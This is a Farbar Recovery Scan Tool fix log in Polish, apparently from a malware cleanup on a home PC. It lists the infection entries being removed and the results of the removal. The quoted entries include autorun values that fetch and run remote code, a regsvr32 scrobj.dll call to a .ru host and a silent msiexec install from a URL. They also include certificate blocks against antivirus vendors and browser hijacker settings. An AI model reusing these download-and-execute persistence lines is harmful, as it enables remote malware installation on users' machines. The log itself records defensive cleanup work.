Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 18-06-2017 01 Uruchomiony przez And (19-06-2017 14:51:36) Run:2 Uruchomiony z C:\Users\And\Downloads Załadowane profile: And & MSSQL$SQLEXPRESS (Dostępne profile: And & MSSQL$SQLEXPRESS) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** loseProcesses: CreateRestorePoint: Task: {7FFF2EF2-C146-4D1C-A628-4D785460AA93} - System32\Tasks\Exif Bestel for Windows 8 => Rundll32.exe "C:\Program Files\Exif Bestel for Windows 8\Exif Bestel for Windows 8.dll",ypTQVww <==== UWAGA Task: {76C36436-3B21-4573-B63E-D6F250AB84E1} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== UWAGA C:\Program Files (x86)\MIO ShortcutWithArgument: C:\Users\And\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\And\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Program Files (x86)\Hotleaf C:\Users\And\AppData\Roaming\Hotleaf C:\Users\And\AppData\Local\Hotleaf C:\Program Files (x86)\Firefox C:\Users\And\AppData\Roaming\Firefox C:\Users\And\AppData\Local\Firefox HKLM\...\RunOnce: [AND-KOMPUTER] => C:\Windows\Temp\gBAC6.tmp.exe [239104 2017-06-19] () <===== UWAGA HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== UWAGA HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== UWAGA HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== UWAGA HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== UWAGA HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== UWAGA HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== UWAGA HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== UWAGA HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== UWAGA HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== UWAGA HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== UWAGA HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== UWAGA HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== UWAGA HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== UWAGA HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== UWAGA HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== UWAGA HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== UWAGA HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== UWAGA HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== UWAGA HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== UWAGA HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== UWAGA HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== UWAGA HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== UWAGA HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== UWAGA HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== UWAGA HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== UWAGA HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== UWAGA HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== UWAGA HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== UWAGA HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== UWAGA HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.bjdnxbgp3.ru/setup.xml scrobj.dll HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [background_fault] => C:\Users\And\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) <===== UWAGA HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj84N8EcOTYyRWhWMYNYMjU1NTlWFjq4M8E1NjHxMdhQRH== /q <===== UWAGA C:\Users\And\AppData\Local\background_fault HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKU\S-1-5-21-1391594616-1957220202-1850595550-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKU\S-1-5-21-1391594616-1957220202-1850595550-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA S2 CSHMDR; C:\Users\And\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA S2 CWASRE; C:\Users\And\AppData\Local\CWASRE\Snare.dll [830464 2017-05-15] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [101016 2017-05-17] () <==== UWAGA S2 NPASRE; C:\Users\And\AppData\Local\NPASRE\Snare.dll [830464 2017-05-12] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA S2 snare; C:\Users\And\AppData\Local\snare\Snare.dll [898048 2017-05-25] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA S2 terana; C:\Users\And\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\sym\dbg.dll [109056 2017-05-12] (TODO: ) [Brak podpisu cyfrowego] <==== UWAGA R2 WinSAPSvc; C:\Users\And\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-17] () [Brak podpisu cyfrowego] <==== UWAGA C:\ProgramData\BIT C:\Users\And\AppData\Local\CSHMDR C:\Users\And\AppData\Local\CWASRE C:\Users\And\AppData\Local\NPASRE C:\Users\And\AppData\Local\snare C:\Users\And\AppData\Local\terana C:\ProgramData\Microsoft\AppV\sym\dbg.dll C:\Users\And\AppData\Roaming\WinSAPSvc2017-05-24 11:08 - 2017-05-31 13:27 - 00001987 _____ C:\Users\And\Desktop\big_bang_empire.lnk 2017-05-24 11:08 - 2017-05-31 13:27 - 00001961 _____ C:\Users\And\Desktop\BigFarm.lnk2017-05-09 12:16 - 2017-05-09 12:16 - 0016176 _____ () C:\Users\And\AppData\Local\InstallationConfiguration.xml 2017-05-09 12:16 - 2017-05-09 12:16 - 0140800 _____ () C:\Users\And\AppData\Local\installer.dat 2017-05-09 12:17 - 2017-05-09 12:17 - 0278509 _____ () C:\Users\And\AppData\Local\Ranrantouch.bin C:\Windows\Temp\gBAC6.tmp.exe C:\Users\And\zijkxhq.exe DeleteKey: HKCU\Software\Hotleaf DeleteKey: HKLM\SOFTWARE\WOW6432Node\Hotleaf DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\And\AppData\Local CMD: dir /a C:\Users\And\AppData\LocalLow CMD: dir /a C:\Users\And\AppData\Roaming CMD: netsh advfirewall reset Hosts: EmptyTemp: ***************** loseProcesses: => Błąd: Nie znaleziono automatycznej naprawy dla tego wejścia. Punkt przywracania został pomyślnie utworzony. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{7FFF2EF2-C146-4D1C-A628-4D785460AA93} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7FFF2EF2-C146-4D1C-A628-4D785460AA93} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Exif Bestel for Windows 8 => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Exif Bestel for Windows 8 => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{76C36436-3B21-4573-B63E-D6F250AB84E1} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{76C36436-3B21-4573-B63E-D6F250AB84E1} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Milimili => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => klucz pomyślnie usunięto C:\Program Files (x86)\MIO => pomyślnie przeniesiono C:\Users\And\Desktop\BigFarm.lnk => Skrót - argument pomyślnie usunięto. C:\Users\And\Desktop\big_bang_empire.lnk => Skrót - argument pomyślnie usunięto. C:\Users\And\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk => Skrót - argument pomyślnie przywrócono C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk => Skrót - argument pomyślnie usunięto. C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk => Skrót - argument pomyślnie usunięto. C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono "C:\Program Files (x86)\Hotleaf" folder - przenoszenie: Nie można przenieść "C:\Program Files (x86)\Hotleaf" => Zaplanowany do przeniesienia przy restarcie. "C:\Users\And\AppData\Roaming\Hotleaf" => nie znaleziono. "C:\Users\And\AppData\Local\Hotleaf" folder - przenoszenie: Nie można przenieść "C:\Users\And\AppData\Local\Hotleaf" => Zaplanowany do przeniesienia przy restarcie. C:\Program Files (x86)\Firefox => pomyślnie przeniesiono "C:\Users\And\AppData\Roaming\Firefox" folder - przenoszenie: Nie można przenieść "C:\Users\And\AppData\Roaming\Firefox" => Zaplanowany do przeniesienia przy restarcie. "C:\Users\And\AppData\Local\Firefox" folder - przenoszenie: Nie można przenieść "C:\Users\And\AppData\Local\Firefox" => Zaplanowany do przeniesienia przy restarcie. HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\AND-KOMPUTER => Wartość pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 => klucz pomyślnie usunięto HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Windows\CurrentVersion\Run\\COM+ => Wartość pomyślnie usunięto HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => Wartość pomyślnie usunięto HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto C:\Users\And\AppData\Local\background_fault => pomyślnie przeniesiono HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet 